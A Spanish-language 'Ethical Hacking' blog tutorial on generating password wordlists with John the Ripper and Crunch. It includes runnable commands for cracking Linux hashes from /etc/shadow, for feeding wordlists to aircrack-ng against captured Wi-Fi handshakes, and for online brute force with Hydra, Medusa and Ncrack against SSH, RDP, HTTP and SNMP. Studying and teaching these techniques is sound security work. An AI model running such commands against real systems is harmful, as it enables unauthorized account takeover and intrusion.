Sitio para la difusión de conocimiento informático. 

Twitter RSS

Generador de Palabras – Password Cracker

Generador de Palabras – Password Cracker

En esta publicación hablaremos de John The Ripper y Crunch, los dos programas más conocidos para generar listas de palabras para luego proceder a comparar hashes y así conseguir contraseñas por fuerza bruta. También mostraremos algunos ejemplos sobre como utilizar la lista de palabras (contraseñas) generadas en conjunto con otras herramientas como Hydra, Medusa, y Ncrack, para ataques de contraseñas online.

 

John The Ripper – Generador de Palabras

Wiki: John the Ripper es un programa de criptografía que aplica fuerza bruta para descifrar contraseñas. Es capaz de romper varios algoritmos de cifrado o hash, como DES, SHA-1 y otros.  Es una herramienta de seguridad muy popular, ya que permite a los administradores de sistemas comprobar que las contraseñas de los usuarios son suficientemente buenas. John the Ripper es capaz de autodetectar el tipo de cifrado de entre muchos disponibles, y se puede personalizar su algoritmo de prueba de contraseñas. Eso ha hecho que sea uno de los más usados en este campo.
HomePage: http://www.openwall.com/john/pro/linux/

Descargar: http://www.openwall.com/john/g/ || http://www.openwall.com/john/

Instalar:
Debian/Ubuntu: apt-get install john && apt-get build-dep john
Redhat/Centos: yum install john
Pasos bajando el Source Code:
– wget www.openwall.com/john/j/john-1.8.0.tar.gz
– tar -xzvf john-1.8.0.tar.gz
– cd john-1.8.0/
– cd src
– ejecutamos “make” y seleccionamos nuestro sistema operativo. En caso de no estar listado usamos la opción “generic”.
– make generic
– cd ..
– cd run
– john –test

Agregando Reglas:
Bajamos los sigueintes archivos:
– wget www.korelogic.com/Resources/Tools/rockyou.chr
– wget www.korelogic.com/Resources/Tools/rockyou-lanman.chr
– wget http://contest-2010.korelogic.com/rules.txt
Agregamos las reglas al archivo de configuración:
– rules.txt >> /etc/john/john.conf
Copiamos los archivos .chr al siguiente directorio:
– cp rockyou.chr /usr/share/john
– cp rockyou-lanman.chr /usr/share/john
Podemos comenzar a utilizar dichas reglas con la opción: –rules
(http://contest-2010.korelogic.com/rules.html).

Algunos Ejemplos y listas de palabras:
Usuarios Linux:
1)  unshadow /etc/passwd /etc/shadow > mypasswd
2) john –session=allrules –wordlist=password.lst –rules mypasswd
Nota: La efectuvidad de este proceso está en la calidad de nuestra lista de palabras.
En caso de querer pasar las palabras generadas a otro proceso podemos usar la opción “–stdout” y pipe.
3) Vemos las contraseñas que se lograron obtener:
john –show mypasswd

Listas de palabras que vienen en Kali-Linux:
http://www.seguridadx.com/archivos/fasttrack.txt
http://www.seguridadx.com/archivos/telnet_cisco_default_pass.txt
http://www.seguridadx.com/archivos/telnet_cisco_default_user.txt
http://www.seguridadx.com/archivos/telnet_cisco_default_userpass.txt
http://www.seguridadx.com/archivos/snmp_default_pass.txt
http://www.seguridadx.com/archivos/rockyou.txt.gz

Integrando John The Ripper a Aircrack:
john –stdout –incremental | aircrack-ng -b $BSSID -w – capture-file.cap
john –session=allrules –wordlist=password.lst –rules mypasswd –stdout | aircrack-ng -b $BSSID -w – capture-file.cap
john –rules –wordlist=/usr/share/john/rockyou.txt –stdout | aircrack-ng -b $BSSID -w – mabel.cap-02.cap

 

Crunch – Generador de Palabras

Es el proyecto generador de lista de palabras y es organizado por SourceForge.net. El equipo del proyecto lo describe como: “Crunch es un generador de lista de palabras donde se puede especificar un conjunto de caracteres estándar o un juego de caracteres que especifique. crisis puede generar todas las posibles combinaciones y permutaciones.”: http://crunch-wordlist.sourceforge.net/.

Descargar: http://sourceforge.net/projects/crunch-wordlist/

Instalar:
Una vez degargado cruch “crunch-3.6.tar.gz”, seguimos los siguientes pasos:
– tar -xzvf crunch-3.6.tar.gz
– cd crunch-3.6
– make && make install

Reglas Crunch:
Si concemos o sospechamos de una estructura especial de la contraseña como por je: [Mayúscula] [2 Minúsculas] [2 Caracteses Especiales] [3 Números]”, Crunch nos permite generar palabras con dicha estructura:
@ – Minúsculas
,    – Mayúsculas
% – Números
^ – Special characters including space

crunch 8 8 -t ,@@^%%%

Algunos ejecmplos del “man crunch”:
1)
crunch 5 5 -d 2@ -t @@@%%
crunch generará strings de 5 caracteres comenzando conaab00 y finalizando con zzy99.  Note que aaa y zzz no están presentes.
2)
crunch 10 10 -t @@@^%%%%^^ -d 2@ -d 3% -b 20mb -o START
crunch generará strings 10 caracteres comenzando con aab!0001!! y finalizando con zzy 9998. La salida será escrita en varios archivos de 20mb.
3)
crunch 8 8 -d 2@
crunch  gemerará  8 caracteres que limítan el mismo número de minúsculas a 2.  Crunch comenzadá con aabaabaa y finalizará con zzyzzyzz.

Integrando Cruch a Aircrack-ng:
crunch 8 8 1234567890abcdefghijklmnñopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ  | aircrack-ng -b 54:22:F8:93:C5:A8 -w – capture-file.cap

 

Usando la lista de palabras generadas para ataques de contraseñas online:

Alguno de los servicios de red que utilizar esquemas de autenticación mediante usuario/contraseña son los siguientes: HTTP, SSH, VNC, FTP, SNMP, POP3, etc. Herramientas como Hydra (http://thc.org/thc-hydra), Medusa (http://h.foofus.net/?page_id=51), Ncrack (http://nmap.org/ncrack), e incluso Metasploit tienen la capacidad de manejar estos esquemas y protocolos de autentiacación.

De esta forma, con la lista de palabras (contraseñas) que generamos con John the Ripper y/o Crunch, podemos usar estas herramientas para adivinar la contraseña de estos servicios de red:

HTTP brute force con Medusa:
medusa -h $IP -u admin -P password-file.txt -M http -m DIR:/admin -T 10

RDP brute force con Ncrack:
ncrack -vv –user offsec -P password-file.txt rdp://$IP

SNMP brute force con Hydra:
hydra -P password-file.txt -v $IP snmp

SSH brute force with Hydra:
hydra -l root -P password-file.txt $IP ssh

 
Home Ethical Hacking Generador de Palabras – Password Cracker